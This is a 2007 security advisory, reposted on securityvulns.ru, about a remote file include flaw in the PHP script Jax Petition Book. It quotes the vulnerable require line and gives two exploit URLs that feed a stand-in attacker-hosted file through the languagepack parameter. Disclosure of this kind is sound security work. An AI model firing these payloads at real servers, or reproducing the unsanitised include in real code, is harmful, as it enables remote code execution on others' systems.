Computer Security

Security Advisory: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  InstantForum.NET Multiple Cross-Site Scripting Vulnerability

  wcSimple Poll (password.
txt) Remote Password Disclosure Vulnerablity

  Okul Web Otomasyon Sistemi (etkinlikbak.
asp) SQL Injection Vulnerability

  vulnerability script indexu all versions

From:ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:17.01.2007
Subject:Jax Petition Book (languagepack) Remote File Include Vulnerabilities

---------------------------------------------------------------------------------
---------------------------------

AYYILDIZ.ORG PreSents...


*Script: Jax Petition Book
*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip

*Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

---------------------------------------------------------------------------------
----------------------------------

*Code:

require ( "language/" .$languagepack . ".inc.php" );

---------------------------------------------------------------------------------
----------------------------------

*Exploit:

jax_petitionbook.php?languagepack=http://attacker.txt?
smileys.php?languagepack=http://attacker.txt?

---------------------------------------------------------------------------------
----------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,DumЂnci
Special Tnx: AYYILDIZ.ORG
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server